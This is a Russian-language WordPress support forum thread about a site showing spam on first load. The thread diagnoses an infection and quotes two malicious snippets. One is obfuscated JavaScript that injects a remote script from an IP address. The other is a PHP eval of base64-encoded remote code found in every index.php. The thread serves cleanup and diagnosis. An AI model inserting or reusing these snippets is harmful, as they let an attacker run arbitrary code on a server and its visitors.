Поддержка Проблемы и решения Проблемы с открытием сайта

  • Добрый день!

    Такая проблема: Если впервые открыть сайт по адресу porhov.ru то откроется левая информация такая как на картинке https://yadi.sk/i/mZKkCrw13NrTTS, если обновить страничку то сайт откроется нормально.. и больше этот спам уже не появляется, если только с другого устройства перейти опять по адресу porhov.ru то появится левая инфа… не могу найти откуда ноги растут.

    Помогите

    Страница, с которой нужна помощь: [войдите, чтобы увидеть ссылку]

Просмотр 7 ответов — с 1 по 7 (всего 7)
  • Было дело как-то с подобной JS инъекцией сталкивался.
    Проверьте с помощью ai-bolit файлы сайта, в файле отчета, скорее всего появятся такие строки:
    var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

    Скорее всего какой-то плагин зараженный поставили.

    Что то не находит Айболит. и с помощью поиска по файлам не найти var _0xaae8=

    Во всех index.php был такой код

    {
    $server=1;
    eval(file_get_contents(base64_decode(‘aHR0cDovL3F0My5wdy93P3U9’).$s[‘HTTP_HOST’]));
    }

    Видимо это оно

    Добрый день,
    Используйте наш продукт,
    CWIS ANTIVRUS он как раз и находит даже то что не находит AIBOLIT.
    https://wordpress.org/plugins/cwis-antivirus-malware-detected/
    Если есть вопросы, буду рад помочь.

    Модератор SeVlad

    (@sevlad)

    wp.me/3YHjQ

    он как раз и находит даже то что не находит AIBOLIT.

    Например что?
    Вот вышеупомянутый eval(file_get_contents(base64 айболит находит.

    Я не собераюсь что то доказывать, скачайте и сравните.
    но то что 100 процентов он не находит, то это в базе данных,я не знаком с другим продуктом который сканирует базу данных.
    и я уже не говарю о количестве ложных срабатывании по сровнению CWIS ANTIVIRUS.

    Модератор SeVlad

    (@sevlad)

    wp.me/3YHjQ

    Я не собераюсь что то доказывать

    Даже Ваши голословные утверждения: «он как раз и находит даже то что не находит AIBOLIT.»
    Это прелестно 🙂

    скачайте

    Бинарник с неизвестными внутреннностями? Нет уж, увольте. Я пока ещё не дожил до такого, чтобы тянуть всякое непонятно от кого. Даже из оф. репо ВП.

Просмотр 7 ответов — с 1 по 7 (всего 7)
  • Тема «Проблемы с открытием сайта» закрыта для новых ответов.